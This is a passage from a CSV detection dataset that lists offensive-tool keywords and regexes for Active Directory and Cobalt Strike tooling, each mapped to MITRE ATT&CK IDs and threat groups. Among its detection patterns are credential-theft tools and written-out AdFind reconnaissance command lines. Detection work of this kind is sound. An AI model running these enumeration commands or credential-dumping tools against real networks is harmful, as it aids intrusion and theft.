menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","0","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*AddUserToDomainGroup.*",".{0,1000}AddUserToDomainGroup\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*AddUserToDomainGroup.cna*",".{0,1000}AddUserToDomainGroup\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a*",".{0,1000}adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADeleg.exe -*",".{0,1000}ADeleg\.exe\s\-.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*ADeleg_InsecureResourceDelegationReport_*",".{0,1000}ADeleg_InsecureResourceDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*ADeleg_InsecureTrusteeDelegationReport_*",".{0,1000}ADeleg_InsecureTrusteeDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*adexplorer.go*",".{0,1000}adexplorer\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*ADExplorerSnapshot.py*",".{0,1000}ADExplorerSnapshot\.py.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. 
It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","8","774","99","2024-02-25T16:37:56Z","2021-12-22T14:42:23Z" "*ADExplorerSnapshot.py.git*",".{0,1000}ADExplorerSnapshot\.py\.git.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","8","774","99","2024-02-25T16:37:56Z","2021-12-22T14:42:23Z" "*adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf*",".{0,1000}adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*adfind -gcb -sc trustdmp*",".{0,1000}adfind\s\-gcb\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc adinfo*",".{0,1000}adfind\s\-sc\sadinfo.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc computers_pwdnotreqd*",".{0,1000}adfind\s\-sc\scomputers_pwdnotreqd.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc dclist*",".{0,1000}adfind\s\-sc\sdclist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc dcmodes*",".{0,1000}adfind\s\-sc\sdcmodes.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc domainlist*",".{0,1000}adfind\s\-sc\sdomainlist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc trustdmp*",".{0,1000}adfind\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -subnets*",".{0,1000}adfind\s\-subnets.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=organizationalUnit\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -f (objectcategory=person) > 
*.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=person\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -f *(objectcategory=group)* > *.txt*",".{0,1000}adfind\.exe\s\-f\s.{0,1000}\(objectcategory\=group\).{0,1000}\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -f objectcategory=computer > *.txt*",".{0,1000}adfind\.exe\s\-f\sobjectcategory\=computer\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -gcb -sc trustdmp > *.txt*",".{0,1000}adfind\.exe\s\-gcb\s\-sc\strustdmp\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AdFind.exe -sc getacls -sddlfilter *computer* 
-recmute*",".{0,1000}AdFind\.exe\s\-sc\sgetacls\s\-sddlfilter\s\s\s.{0,1000}computer.{0,1000}\s\s\-recmute.{0,1000}","offensive_tool_keyword","POC","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*",".{0,1000}adfind\.exe\s\-subnets\s\-f\s\(objectCategory\=subnet\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ADFSDump.csproj*",".{0,1000}ADFSDump\.csproj.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADFSDump.sln*",".{0,1000}ADFSDump\.sln.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*ADFSpoof.py*",".{0,1000}ADFSpoof\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ADFSpoof-master*",".{0,1000}ADFSpoof\-master.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*ADFSpray.csv*",".{0,1000}ADFSpray\.csv.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*adfspray.git*",".{0,1000}adfspray\.git.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*ADFSpray.py*",".{0,1000}ADFSpray\.py.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*ADFSRelay -*",".{0,1000}ADFSRelay\s\-.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*ADFSRelay-main*",".{0,1000}ADFSRelay\-main.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. 
ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*ADHunt-main.zip*",".{0,1000}ADHunt\-main\.zip.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*adidnsdump -u *",".{0,1000}adidnsdump\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*adidnsdump*",".{0,1000}adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*ad-ldap-enum.py*",".{0,1000}ad\-ldap\-enum\.py.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*ad-ldap-enum-main*",".{0,1000}ad\-ldap\-enum\-main.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*adm|admin|root|sudo|wheel*",".{0,1000}adm\|admin\|root\|sudo\|wheel.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*admin.kirbi*",".{0,1000}admin\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*admin_macos_x64 -rhost * -rport *",".{0,1000}admin_macos_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Admin2Sys.exe*",".{0,1000}Admin2Sys\.exe.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys is a C++ malware to escalate privileges from Administrator account to NT AUTHORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*Admin2Sys-main*",".{0,1000}Admin2Sys\-main.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys is a C++ malware to escalate privileges from Administrator account to NT AUTHORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*AD-miner -*",".{0,1000}AD\-miner\s\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*Adminisme/ServerScan/*",".{0,1000}Adminisme\/ServerScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*Administrator privileges required to spoof processes*",".{0,1000}Administrator\sprivileges\srequired\sto\sspoof\sprocesses.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - 
